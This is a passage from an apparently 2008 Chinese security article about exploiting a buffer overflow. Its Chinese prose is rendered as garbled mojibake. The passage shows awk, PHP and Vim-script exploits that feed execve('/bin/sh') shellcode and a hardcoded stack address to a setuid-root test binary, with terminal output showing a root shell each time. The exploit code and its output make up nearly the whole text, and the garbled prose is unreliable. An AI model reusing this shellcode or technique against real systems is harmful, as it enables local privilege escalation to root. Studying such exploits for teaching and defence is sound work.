Òç³öÀûÓóÌÐòºÍ±à³ÌÓïÑÔ´óÔÓ»â
|
| ¸üÐÂʱ¼ä:2008-2-13 0:13:02 |
ÔðÈαà¼:¸ßÔ¶ |
|
|
<Îå> awkÓïÑÔ°æ±¾ÀûÓóÌÐòex.awk
[cloud@test]$Content$nbsp;cat ex.awk
# Demo for exploit bof of "./vul"
# Write by watercloud @ xfocus.org
BEGIN{
SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
AG="AA";
for ( i=0;i<10;i++)
{
AG=AG""AG;
}
AG=AG""AG""AG #3096
for(i=0;i<20;i++)
{
AD=AD"\xe8\xf3\xff\xbf"; #ADDR:0xbffff3e8
}
AA="AA"
for(i=0;i<4;i++)
{
AA=AA"A"
system("./vul "AA""AD" "AG""SH)
}
}
#EOF
[cloud@test]$Content$nbsp;gawk -f ex.awk /dev/null
buff : AAAèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è??
buff : AAAAèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è??
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b#
<Áù> PHP°æ±¾
[cloud@MagicLinux tmp]$Content$nbsp;id
uid=502(cloud) gid=502(cloud) groups=502(cloud)
[cloud@MagicLinux tmp]$Content$nbsp;ls -l vul
-rwsr-xr-x 1 root root 4895 2ÔÂ 26 20:57 vul
[cloud@MagicLinux tmp]$Content$nbsp;cat ex.php
<?php
$SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
$AG="AA";
for( $i=0;$i<10;$i++){
$AG.=$AG;
}
$AG.=$AG.$AG; #3096
for($i=0;$i<20;$i++) {
$AD.="\xff\xbf\xe8\xf3";#ADDR:0xbffff3e8
}
for($i=0;$i<4;$i++) {
$AA.="A";
print system("./vul ".$AA.$AD.$AG.$SH);
}
?>
[cloud@MagicLinux tmp]$Content$nbsp;php ex.php 1>/dev/null
id >&2
uid=0(root) gid=502(cloud) groups=502(cloud)
exit
[cloud@MagicLinux tmp]$Content$nbsp;
<Æß> VimÀ©Õ¹½Å±¾°æ±¾
Á¬vim±à¼Æ÷µÄÀ©Õ¹±à³Ì½Å±¾Ò²¿ÉÒÔÄÃÀ´Ð´Òç³öµÄ˵£º
[cloud@MagicLinux tmp]$Content$nbsp;id
uid=502(cloud) gid=502(cloud) groups=502(cloud)
[cloud@MagicLinux tmp]$Content$nbsp;cat ex.vim
let SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80"
let AG="AA"
let i=0
while(i<10)
let AG=AG.AG
let i=i+1
endwhile
let AG=AG.AG.AG
"len of AG is 3096
let AD=""
let i=0
while(i<20)
let AD=AD."\xff\xbf\xe8\xf3"
"ADDR:0xbffff3e8
let i=i+1
endwhile
let AA=""
let i=0
while(i<4)
let AA=AA."A"
execute "!./vul ". AA . AD . AG . SH
let i=i+1
endwhile
[cloud@MagicLinux tmp]$Content$nbsp;ls -l vul
-rwsr-xr-x 1 root root 4895 2ÔÂ 26 20:57 vul
[cloud@MagicLinux tmp]$Content$nbsp;vim -eS ex.vim
Xlib: connection to ":0.0" refused by server
Xlib: No protocol specified
buff : A�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿è�¿èóAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1ÀPPP[YZ4ÐÍ�j
X™Rhn/shh//biT[RSTYÍ€
sh-2.05b# id
uid=0(root) gid=502(cloud) groups=502(cloud)
sh-2.05b#
<°Ë> ¡¡
<¾Å> СÓï
Òç³öµÄ¸ù±¾ÔÚÓÚµØÖ·¶¨Î»¡¢¶ÑÕ»µÈÊý¾Ý½á¹¹µÄʹÓÃÔ¼¶¨ºÍ×éÖ¯¡¢²Ù×÷ϵͳÔËÐÐʱ½á¹¹µÈÁ˽âÕâЩ֪ʶºóÒç³öÀûÓñ¾ÉúºÍ±à³ÌÓïÑÔÊÇûÓйØϵµÄ¡£ÉÏÒ»Ò³ 1 2 |
|
°²È«ÖйúÊ×Ò³ > ÎÄÕÂÖÐÐÄ > Òç³öÎÄÕÂ